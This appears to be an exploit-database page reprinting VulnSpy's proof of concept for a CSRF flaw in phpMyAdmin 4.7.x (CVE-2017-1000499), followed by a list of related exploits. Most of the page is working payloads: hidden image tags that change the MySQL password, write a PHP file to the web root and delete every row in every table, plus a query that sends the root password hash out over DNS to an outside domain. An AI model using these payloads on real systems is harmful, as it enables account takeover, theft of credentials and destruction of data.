phpMyAdmin 4.7.x - Cross-Site Request Forgery Vulnerability

🗓️ 29 Aug 2018 00:00:00Reported by VulnSpyType

zdt🔗 0day.today👁 157 Views

phpMyAdmin 4.7.x - CSRF Vulnerabilit

Reporter	Title	Published	Views	Family All 52
0day.today	Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page Exploit	1 Dec 201700:00	–	zdt
0day.today	glibc ld.so - Memory Leak / Buffer Overflow Vulnerability	14 Dec 201700:00	–	zdt
0day.today	b2evolution CMS 6.8.10 PHP Code Execution Vulnerability	3 Jan 201800:00	–	zdt
0day.today	Vanilla < 2.1.5 - Cross-Site Request Forgery Vulnerability	8 Jan 201800:00	–	zdt
0day.today	Primefaces 5.x - Remote Code Execution Exploit	18 Jan 201800:00	–	zdt
0day.today	Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (2) Exploit	20 Mar 201800:00	–	zdt
0day.today	Vehicle Sales Management System - Multiple Vulnerabilities	20 Mar 201800:00	–	zdt
Atlassian	Code Injection and Directory Traversal in plexus-utils	25 Jan 202104:06	–	atlassian
BDU FSTEC	The vulnerability of the Solaris component (a kernel subsystem of the operating system) allows a attacker to gain access to all resources of the operating system.	18 Aug 201700:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the Kernel component of the Solaris operating system, which allows a hacker to gain control over the system	15 Sep 201700:00	–	bdu_fstec

# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499
 
# Exploit CSRF - Modifying the password of current user
 
<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
 
# Exploit CSRF - Arbitrary File Write
 
<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select
'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
style="display:none;" />
 
# Exploit CSRF - Data Retrieval over DNS
 
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));
 
# Exploit CSRF - Empty All Rows From All Tables
 
<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
style="display:none;" />

#  0day.today [2018-08-29]  #

29 Aug 2018 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.11439